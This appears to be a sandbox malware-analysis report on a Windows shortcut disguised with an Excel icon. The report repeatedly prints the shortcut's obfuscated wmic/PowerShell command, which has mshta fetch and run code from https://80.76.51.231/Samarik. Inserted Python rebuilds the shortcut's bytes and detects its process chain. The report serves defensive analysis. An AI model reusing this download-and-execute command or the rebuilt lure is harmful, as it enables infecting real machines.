                                  SHA-256:C5676BB494B82BF0CC2387DE9E2AAE0D5392E09B822CF178D8E1AE7D414C5365
                                  SHA-512:A8EEF04140E977A5F3783C7193896A2789DA4B026A540580EDA7F2B8BD627D0A8BEEE78B08C8F0AC28458E84C948608B3EC4E8D027EAF9E57ACB62E36CB7D2D5
                                  Malicious:false
                                  Reputation:low
                                  Preview:...-.....................................;...{.. ....|.......{}..............{}......{}.vv_Q.....{}.................;x.g ....|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):2832
                                  Entropy (8bit):5.418003316338724
                                  Encrypted:false
                                  SSDEEP:48:0AzsSU4y4RQmFoUL5o+m9qr9t5/78NVGGxJZKaVEouYAgwd64rHLjtvz:0AzlHyIFKES9qrh7KNJ5Eo9Adrxz
                                  MD5:7DEBE7F44414A6DD2EC9C2C55C926657
                                  SHA1:41E859A82AD20F4AE658F312E141723CE480536C
                                  SHA-256:9F790A21D956FE2BF9DB633A383B59E6F3B582EAD49410312CFAED7DDD880E31
                                  SHA-512:0982A73211AF67C8B5EC178F9540FDABB35405F6D903DAE2C8B12CDB6E3D37723B630C5B985F8C3712DE2EC6B260B61D67DA066FA23EDBE4A3ED0DDC1B56E5BC
                                  Malicious:false
                                  Preview:@...e...........................................................H..............@-....f.J.|.7h8..-.......Microsoft.Powershell.PSReadline.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.<...............i..VdqF...|...........System.Configuration4.................0..~.J.R...L........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.8.................C}...C....n..Bi.......Microsoft.CSharpP...............
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):64
                                  Entropy (8bit):1.1940658735648508
                                  Encrypted:false
                                  SSDEEP:3:Nlllultnxj:NllU
                                  MD5:F93358E626551B46E6ED5A0A9D29BD51
                                  SHA1:9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03
                                  SHA-256:0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
                                  SHA-512:D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853
                                  Malicious:false
                                  Preview:@...e................................................@..........
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\svchost.exe
                                  File Type:JSON data
                                  Category:dropped
                                  Size (bytes):55
                                  Entropy (8bit):4.306461250274409
                                  Encrypted:false
                                  SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                  MD5:DCA83F08D448911A14C22EBCACC5AD57
                                  SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                  SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                  SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                  Malicious:false
                                  Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                  Process:C:\Windows\System32\wbem\WMIC.exe
                                  File Type:ASCII text, with CRLF, CR line terminators
                                  Category:dropped
                                  Size (bytes):160
                                  Entropy (8bit):5.095703110114614
                                  Encrypted:false
                                  SSDEEP:3:YwM2FgCKGWMRX1eRHXWXKSovrj4WA3iygK5k3koZ3Pveys1MglR2oO6JQAiveyzr:Yw7gJGWMXJXKSOdYiygKkXe/egyodeAc
                                  MD5:F7BD1022C29D3557B7F473259B64C68F
                                  SHA1:E31F3A3944CE634A2206D36D7697A8D8ACF07EDD
                                  SHA-256:DA218F2D2F1B39D996D876B6093A902E9CB8F4F92DDD4D4CC1F64D55DA2DFDC6
                                  SHA-512:8FC5A197831D75D59249AA0245FBE7EC37FC379A0BB5235FFB8B3E316FCA5CA9FAED806531FCA37336FBDEB782ABF684960E1DAFD5F8D1594273B1EC9CF5F2EF
                                  Malicious:false
                                  Preview:Executing (Win32_Process)->Create()...Method execution successful....Out Parameters:..instance of __PARAMETERS..{...ProcessId = 7488;...ReturnValue = 0;..};....
                                  File type:MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has command line arguments, Icon number=1, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hidenormalshowminimized
                                  Entropy (8bit):2.6818046608099295
                                  TrID:
                                  • Windows Shortcut (20020/1) 100.00%
                                  File name:6G4au3vWsI.lnk
                                  File size:1'886 bytes
                                  MD5:2b4f800413a890176ebfec3ccc57fcbb
                                  SHA1:2411ba93cc9bfbc4498faf4b156d0fbfaefd03ca
                                  SHA256:9c9e8ac1e4fa6cd293e72c02e35417042e55ee3ee70a4460b0fce1d320e183c5
                                  SHA512:c0ccf597e77340cde20d83e3dae5e74c837e54e65ec51e9d93d216d9ce5c8d483003e4494978aa7229a5f9cfbe891ebaee1620c23c7183a092fcb02de157aab7
                                  SSDEEP:24:8X/BUlgKN4eA+/3dkW9Lfzj6dCZTCJCZkrab/FYPs:8PuGeHd5fzj6dCZTCJCZ6abKP
                                  TLSH:3A415614A6F51B10F6F2893348B9A712DA373805D9228F2D019245892427D61FC66F2F
                                  File Content Preview:L..................F.@...........................................................P.O. .:i.....+00.../C:\...................V.1...........Windows.@.............................................W.i.n.d.o.w.s.....Z.1...........System32..B.....................
                                  Icon Hash:74f4e6c4c4c9c1cd

                                  General

                                  Relative Path:..\..\..\Windows\System32\Wbem\wmic.exe
                                  Command Line Argument:process call create "powershell iex '\*i*\S*3*\m*ta.e* https://80.76.51.231/Samarik' | powershell -"
                                  Icon location:C:\Program Files (x86)\Microsoft Office\root\Office16\XLICONS.EXE
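The three fields above are the LNK's StringData section, and the process list later in this report shows what the wildcard path inside the argument string resolved to: mshta.exe (Target ID 5). The following Python is an added example for this report, not Joe Sandbox code and not part of the sample: it parses those fields from an LNK constructed here to mirror the report's values, pulls out the wildcard token, and resolves it with a segment-wise glob against a constructed subset of System32. The LinkFlags and StringData layout follow MS-SHLLINK; the LNK bytes, the file list and the token filter are assumptions.

```python
"""Parse the StringData of a Windows shortcut and resolve the wildcard-mangled
executable path found in this sample's command line.

Added example for this report, not Joe Sandbox code and not part of the sample.
The LNK bytes are constructed from the fields the report lists; the System32
listing used for wildcard resolution is a constructed subset, not a real walk.
"""
import fnmatch
import re
import struct

# LinkFlags bits (MS-SHLLINK 2.1.1)
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_RELATIVE_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKING_DIR, HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HEADER_SIZE = 0x4C
# StringData sections follow the header, IDList and LinkInfo in this fixed order.
STRING_FIELDS = [("name", HAS_NAME), ("relative_path", HAS_RELATIVE_PATH),
                 ("working_dir", HAS_WORKING_DIR), ("arguments", HAS_ARGUMENTS),
                 ("icon_location", HAS_ICON_LOCATION)]


def parse_lnk(data: bytes) -> dict:
    """Return flags, icon index, ShowCommand and whichever StringData fields exist."""
    if len(data) < HEADER_SIZE or struct.unpack_from("<I", data)[0] != HEADER_SIZE:
        raise ValueError("not a ShellLinkHeader")
    if data[4:20] != LNK_CLSID:
        raise ValueError("bad LinkCLSID")
    flags = struct.unpack_from("<I", data, 20)[0]
    icon_index, show_cmd = struct.unpack_from("<iI", data, 56)
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:           # u16 IDListSize, then the list
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                     # u32 LinkInfoSize counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    out = {"flags": flags, "icon_index": icon_index, "show_command": show_cmd}
    for field, bit in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]   # characters, not bytes
        pos += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[pos:pos + count * width]
        pos += count * width
        out[field] = raw.decode("utf-16-le" if width == 2 else "cp1252")
    return out


def build_lnk(relative_path: str, arguments: str, icon_location: str,
              show_command: int = 7, icon_index: int = 1) -> bytes:
    """Construct a minimal Unicode LNK: header, one-item IDList, three strings."""
    flags = (HAS_LINK_TARGET_ID_LIST | HAS_RELATIVE_PATH | HAS_ARGUMENTS
             | HAS_ICON_LOCATION | IS_UNICODE)
    header = struct.pack("<I16sII", HEADER_SIZE, LNK_CLSID, flags, 0)
    header += b"\x00" * 24                        # Creation/Access/Write FILETIMEs zeroed
    header += struct.pack("<IiIHHII", 0, icon_index, show_command, 0, 0, 0, 0)
    item = struct.pack("<H", 4) + b"\x1f\x50"    # dummy ItemID; size includes itself
    id_list = struct.pack("<H", len(item) + 2) + item + b"\x00\x00"  # TerminalID

    def enc(s):
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + id_list + enc(relative_path) + enc(arguments) + enc(icon_location)


def wildcard_tokens(arguments: str) -> list:
    """Command-line tokens that are backslash paths containing a '*' wildcard."""
    return [t for t in re.findall(r"[^\s'\"]+", arguments) if "*" in t and "\\" in t]


def resolve_wildcard_path(pattern: str, candidates: list) -> list:
    """Segment-wise, case-insensitive glob of a drive-rooted wildcard path against
    full paths; a stand-in for the FileSystem provider's wildcard expansion."""
    segs = [s for s in pattern.split("\\") if s]
    hits = []
    for path in candidates:
        parts = path.split("\\")[1:]              # drop the "C:" segment
        if len(parts) == len(segs) and all(
                fnmatch.fnmatchcase(p.lower(), g.lower()) for p, g in zip(parts, segs)):
            hits.append(path)
    return hits


# Constructed stand-in for a directory walk of C:\Windows (not a real listing).
SYSTEM32_SAMPLE = [
    r"C:\Windows\System32\mshta.exe", r"C:\Windows\System32\mstsc.exe",
    r"C:\Windows\System32\Wbem\wmic.exe", r"C:\Windows\SysWOW64\mshta.exe",
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
]

SAMPLE_LNK = build_lnk(
    relative_path=r"..\..\..\Windows\System32\Wbem\wmic.exe",
    arguments="process call create \"powershell iex '\\*i*\\S*3*\\m*ta.e* "
              "https://80.76.51.231/Samarik' | powershell -\"",
    icon_location=r"C:\Program Files (x86)\Microsoft Office\root\Office16\XLICONS.EXE")


def analyze_sample() -> dict:
    info = parse_lnk(SAMPLE_LNK)
    info["wildcard_tokens"] = wildcard_tokens(info["arguments"])
    info["resolved"] = [resolve_wildcard_path(t, SYSTEM32_SAMPLE) for t in info["wildcard_tokens"]]
    return info


if __name__ == "__main__":
    for key, value in analyze_sample().items():
        print(f"{key}: {value}")
```

On a live host the same resolution is a single `Resolve-Path '\*i*\S*3*\m*ta.e*'` in PowerShell, which is a quick way to confirm what a wildcard-mangled command would have run. The glob above makes the point behind the trick: `*i*`, `S*3*` and `m*ta.e*` are loose enough that only one System32 binary satisfies all three, yet the string contains no literal `mshta` for a keyword match on the command line to catch.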
Timestamp                        SID      Signature                                  Severity  Source IP    Source Port  Dest IP       Dest Port  Protocol
2024-12-06T10:27:48.742769+0100  2028765  ET JA3 Hash - [Abuse.ch] Possible Dridex   3         192.168.2.9  49707        80.76.51.231  443        TCP
Timestamp                           Source Port  Dest Port  Source IP     Dest IP
Dec 6, 2024 10:27:04.696624994 CET  49707        443        192.168.2.9   80.76.51.231
Dec 6, 2024 10:27:04.696683884 CET  443          49707      80.76.51.231  192.168.2.9
Dec 6, 2024 10:27:04.696778059 CET  49707        443        192.168.2.9   80.76.51.231
Dec 6, 2024 10:27:04.722671986 CET  49707        443        192.168.2.9   80.76.51.231
Dec 6, 2024 10:27:04.722696066 CET  443          49707      80.76.51.231  192.168.2.9
Dec 6, 2024 10:27:48.742623091 CET  443          49707      80.76.51.231  192.168.2.9
Dec 6, 2024 10:27:48.742769003 CET  49707        443        192.168.2.9   80.76.51.231
Dec 6, 2024 10:27:48.743000984 CET  49707        443        192.168.2.9   80.76.51.231
Dec 6, 2024 10:27:48.743014097 CET  443          49707      80.76.51.231  192.168.2.9
Dec 6, 2024 10:27:48.752580881 CET  49710        443        192.168.2.9   80.76.51.231
Dec 6, 2024 10:27:48.752626896 CET  443          49710      80.76.51.231  192.168.2.9
Dec 6, 2024 10:27:48.752696037 CET  49710        443        192.168.2.9   80.76.51.231
Dec 6, 2024 10:27:48.753051043 CET  49710        443        192.168.2.9   80.76.51.231
Dec 6, 2024 10:27:48.753066063 CET  443          49710      80.76.51.231  192.168.2.9
Dec 6, 2024 10:28:32.790530920 CET  443          49710      80.76.51.231  192.168.2.9
Dec 6, 2024 10:28:32.790695906 CET  49710        443        192.168.2.9   80.76.51.231
Dec 6, 2024 10:28:32.791055918 CET  49710        443        192.168.2.9   80.76.51.231
Dec 6, 2024 10:28:32.791088104 CET  443          49710      80.76.51.231  192.168.2.9
Dec 6, 2024 10:28:32.792018890 CET  49712        443        192.168.2.9   80.76.51.231
Dec 6, 2024 10:28:32.792066097 CET  443          49712      80.76.51.231  192.168.2.9
Dec 6, 2024 10:28:32.792140961 CET  49712        443        192.168.2.9   80.76.51.231
Dec 6, 2024 10:28:32.793075085 CET  49712        443        192.168.2.9   80.76.51.231
Dec 6, 2024 10:28:32.793107986 CET  443          49712      80.76.51.231  192.168.2.9
Dec 6, 2024 10:28:32.793152094 CET  49712        443        192.168.2.9   80.76.51.231


                                  Target ID:1
                                  Start time:04:27:00
                                  Start date:06/12/2024
                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\Wbem\wmic.exe" process call create "powershell iex '\*i*\S*3*\m*ta.e* https://80.76.51.231/Samarik' | powershell -"
                                  Imagebase:0x7ff655480000
                                  File size:576'000 bytes
                                  MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:2
                                  Start time:04:27:00
                                  Start date:06/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff70f010000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:3
                                  Start time:04:27:00
                                  Start date:06/12/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:powershell iex '\*i*\S*3*\m*ta.e* https://80.76.51.231/Samarik' | powershell -
                                  Imagebase:0x7ff760310000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:4
                                  Start time:04:27:00
                                  Start date:06/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff70f010000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:5
                                  Start time:04:27:03
                                  Start date:06/12/2024
                                  Path:C:\Windows\System32\mshta.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\mshta.exe" https://80.76.51.231/Samarik
                                  Imagebase:0x7ff7fc930000
                                  File size:14'848 bytes
                                  MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:moderate
                                  Has exited:false

                                  Target ID:6
                                  Start time:04:27:03
                                  Start date:06/12/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -
                                  Imagebase:0x7ff760310000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:11
                                  Start time:04:28:32
                                  Start date:06/12/2024
                                  Path:C:\Windows\System32\svchost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                  Imagebase:0x7ff77afe0000
                                  File size:55'320 bytes
                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:false
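The process records above give the chain the shortcut produced: wmic.exe, a powershell.exe instance carrying the iex string, mshta.exe fetching the URL, and a second powershell.exe started with only `-`. The Python below is an added example for this report, not Joe Sandbox's detection logic and not a Sigma rule: it runs a few command-line rules over constructed process-creation events built from those command lines and shows why parent-pid lineage alone loses the WMI hop. The only PID taken from the report is 7488 (the ProcessId in the WMIC output file listed under dropped files); the other PIDs, the explorer.exe origin and the WmiPrvSE.exe parent are assumptions.

```python
"""Flag the wmic -> powershell -> mshta chain from process-creation events.

Added example for this report; not Joe Sandbox detection logic and not a Sigma
rule. Command lines are the ones the report's process table lists. PIDs other
than 7488, the explorer.exe origin and the WmiPrvSE.exe parent are assumed:
Win32_Process.Create runs inside the WMI provider host, so the process it
creates is a child of WmiPrvSE.exe, not of wmic.exe.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str       # image file name only, lower-case
    cmdline: str


EVENTS = [  # constructed; see the module docstring
    ProcEvent(4000, 1, "explorer.exe", r"C:\Windows\explorer.exe"),
    ProcEvent(4100, 4000, "wmic.exe",
              '"C:\\Windows\\System32\\Wbem\\wmic.exe" process call create '
              '"powershell iex \'\\*i*\\S*3*\\m*ta.e* https://80.76.51.231/Samarik\' | powershell -"'),
    ProcEvent(4200, 1, "wmiprvse.exe", r"C:\Windows\system32\wbem\wmiprvse.exe"),
    ProcEvent(7488, 4200, "powershell.exe",
              "powershell iex '\\*i*\\S*3*\\m*ta.e* https://80.76.51.231/Samarik' | powershell -"),
    ProcEvent(4300, 7488, "mshta.exe", '"C:\\Windows\\System32\\mshta.exe" https://80.76.51.231/Samarik'),
    ProcEvent(4400, 7488, "powershell.exe",
              '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -'),
]

WILDCARD_PATH = re.compile(r"\\[^\s'\"]*\*[^\s'\"]*")          # backslash path holding a '*'
WMI_CREATE = re.compile(r"process\s+call\s+create\s+\"(.*)\"\s*$", re.I | re.S)

RULES = {  # rule name -> (image, predicate over the command line)
    "wmi_process_create": ("wmic.exe", lambda c: re.search(r"process\s+call\s+create", c, re.I)),
    "powershell_iex_wildcard_path": ("powershell.exe", lambda c: re.search(
        r"\b(iex|invoke-expression)\b", c, re.I) and WILDCARD_PATH.search(c)),
    "mshta_remote_url": ("mshta.exe", lambda c: re.search(r"\bhttps?://", c, re.I)),
    "powershell_script_from_stdin": ("powershell.exe", lambda c: c.rstrip().endswith(" -")),
}


def detect(events) -> list:
    """Return (pid, rule_name) for every event a rule matches."""
    hits = []
    for e in events:
        for name, (image, pred) in RULES.items():
            if e.image == image and pred(e.cmdline):
                hits.append((e.pid, name))
    return hits


def lineage(events, pid) -> list:
    """Image names from the oldest known ancestor down to pid."""
    by_pid = {e.pid: e for e in events}
    chain = []
    while pid in by_pid:
        chain.append(by_pid[pid].image)
        pid = by_pid[pid].ppid
    return chain[::-1]


def link_wmi_children(events) -> dict:
    """Map each wmic 'process call create' event to the process it created by
    matching the quoted argument against other command lines; ppid correlation
    cannot do this because the created process hangs off WmiPrvSE.exe."""
    links = {}
    for e in events:
        if e.image != "wmic.exe":
            continue
        m = WMI_CREATE.search(e.cmdline)
        if m:
            links[e.pid] = [o.pid for o in events if o.pid != e.pid and o.cmdline == m.group(1)]
    return links


if __name__ == "__main__":
    print(detect(EVENTS))
    print(lineage(EVENTS, 4300))           # wmic.exe is absent from the ancestry
    print(link_wmi_children(EVENTS))       # recovered via the quoted create argument
```

The second powershell.exe carries only a lone `-`, which makes it read its script from standard input (here the first instance's pipeline), so its command line reveals nothing by itself; the content worth matching sits in the first instance and in the mshta.exe URL. Correlating on the quoted argument of `process call create`, as link_wmi_children does, recovers the wmic.exe link that ppid-based lineage loses.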


                                    Execution Graph

                                    Execution Coverage:6.6%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:0%
                                    Total number of Nodes:6
                                    Total number of Limit Nodes:0
Execution graph (rendered graph not reproduced; node addresses and edges only): 0x7ff887a1c809 -> 0x7ff887a1c80f (CreateFileW) -> 0x7ff887a1c8de; 0x7ff887a145ea -> 0x7ff887a5f260 (GetFileType) -> 0x7ff887a5f2e4

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
control_flow_graph 158 7ff887a15f80-7ff887a1b5c0 163 7ff887a1b5cc-7ff887a1b603 158->163 164 7ff887a1b5c2-7ff887a1b5c7 call 7ff887a15fe0 158->164 167 7ff887a1b609-7ff887a1b614 163->167 168 7ff887a1b7f4-7ff887a1b809 163->168 164->163 169 7ff887a1b682-7ff887a1b687 167->169 170 7ff887a1b616-7ff887a1b61e 167->170 180 7ff887a1b80b-7ff887a1b812 168->180 181 7ff887a1b813-7ff887a1b819 168->181 172 7ff887a1b689-7ff887a1b695 169->172 173 7ff887a1b6f3-7ff887a1b6fd 169->173 170->168 171 7ff887a1b624-7ff887a1b639 170->171 177 7ff887a1b63b-7ff887a1b660 171->177 178 7ff887a1b662-7ff887a1b66d 171->178 172->168 179 7ff887a1b69b-7ff887a1b6ae 172->179 175 7ff887a1b71f-7ff887a1b727 173->175 176 7ff887a1b6ff-7ff887a1b71d call 7ff887a16000 173->176 186 7ff887a1b72a-7ff887a1b735 175->186 176->175 177->178 189 7ff887a1b6b0-7ff887a1b6b3 177->189 178->168 185 7ff887a1b673-7ff887a1b680 178->185 179->186 180->181 182 7ff887a1b7da-7ff887a1b7df call 7ff887a16000 181->182 183 7ff887a1b81a-7ff887a1b85e 181->183 202 7ff887a1b7e2-7ff887a1b7f3 182->202 207 7ff887a1b87b-7ff887a1b88c 183->207 208 7ff887a1b860-7ff887a1b866 183->208 185->169 185->170 186->168 191 7ff887a1b73b-7ff887a1b756 186->191 195 7ff887a1b6bf-7ff887a1b6c7 189->195 196 7ff887a1b6b5 189->196 191->168 194 7ff887a1b75c-7ff887a1b76f 191->194 194->168 199 7ff887a1b775-7ff887a1b786 194->199 195->168 200 7ff887a1b6cd-7ff887a1b6f2 195->200 196->195 199->168 206 7ff887a1b788-7ff887a1b797 199->206 206->202 209 7ff887a1b799-7ff887a1b7a4 206->209 212 7ff887a1b89d-7ff887a1b8c0 207->212 213 7ff887a1b88e-7ff887a1b899 207->213 210 7ff887a1b868-7ff887a1b879 208->210 211 7ff887a1b8c1-7ff887a1b93a 208->211 209->202 216 7ff887a1b7a6-7ff887a1b7d8 209->216 210->207 210->208 226 7ff887a1b93c-7ff887a1b94c 211->226 227 7ff887a1b94e-7ff887a1b95f 211->227 213->212 216->182 226->226 226->227 229 7ff887a1b961-7ff887a1b96c 227->229 230 7ff887a1b970-7ff887a1b9a1 227->230 229->230 234 7ff887a1b9a3-7ff887a1b9a9 230->234 235 7ff887a1b9f7-7ff887a1b9fe 230->235 234->235 238 7ff887a1b9ab-7ff887a1b9ac 234->238 236 7ff887a1ba3f-7ff887a1ba68 235->236 237 7ff887a1ba00-7ff887a1ba01 235->237 239 7ff887a1ba04-7ff887a1ba07 237->239 240 7ff887a1b9af-7ff887a1b9b2 238->240 241 7ff887a1ba69-7ff887a1bb32 239->241 243 7ff887a1ba09-7ff887a1ba1a 239->243 240->241 242 7ff887a1b9b8-7ff887a1b9c8 240->242 259 7ff887a1bb3b-7ff887a1bb3f 241->259 260 7ff887a1bb34-7ff887a1bb39 241->260 245 7ff887a1b9ca-7ff887a1b9ec 242->245 246 7ff887a1b9f0-7ff887a1b9f5 242->246 247 7ff887a1ba1c-7ff887a1ba22 243->247 248 7ff887a1ba36-7ff887a1ba3d 243->248 245->246 246->235 246->240 247->241 251 7ff887a1ba24-7ff887a1ba32 247->251 248->236 248->239 251->248 261 7ff887a1bb42-7ff887a1bba1 259->261 260->261 266 7ff887a1bbd9-7ff887a1bc2c 261->266 267 7ff887a1bba3-7ff887a1bbd4 call 7ff887a14620 261->267 275 7ff887a1bc2e-7ff887a1bc33 266->275 276 7ff887a1bc35-7ff887a1bc39 266->276 267->266 277 7ff887a1bc3c-7ff887a1bc87 275->277 276->277 281 7ff887a1bc89-7ff887a1bc8e 277->281 282 7ff887a1bc90-7ff887a1bc94 277->282 283 7ff887a1bc97-7ff887a1bdb6 281->283 282->283 297 7ff887a1bdb8-7ff887a1bdba 283->297 298 7ff887a1bdbc-7ff887a1bdd5 283->298 299 7ff887a1bdd7-7ff887a1bde5 297->299 298->299 301 7ff887a1bdeb-7ff887a1be5c call 7ff887a16dd8 299->301 302 7ff887a1be72-7ff887a1be9e 299->302 338 7ff887a1be5e-7ff887a1be6b 301->338 339 7ff887a1be71 301->339 303 7ff887a1bf58-7ff887a1bf98 302->303 304 7ff887a1bea4-7ff887a1bf51 call 7ff887a16d88 302->304 314 7ff887a1c089-7ff887a1c097 call 7ff887a1c12e 303->314 315 7ff887a1bf9e-7ff887a1bfac 303->315 304->303 328 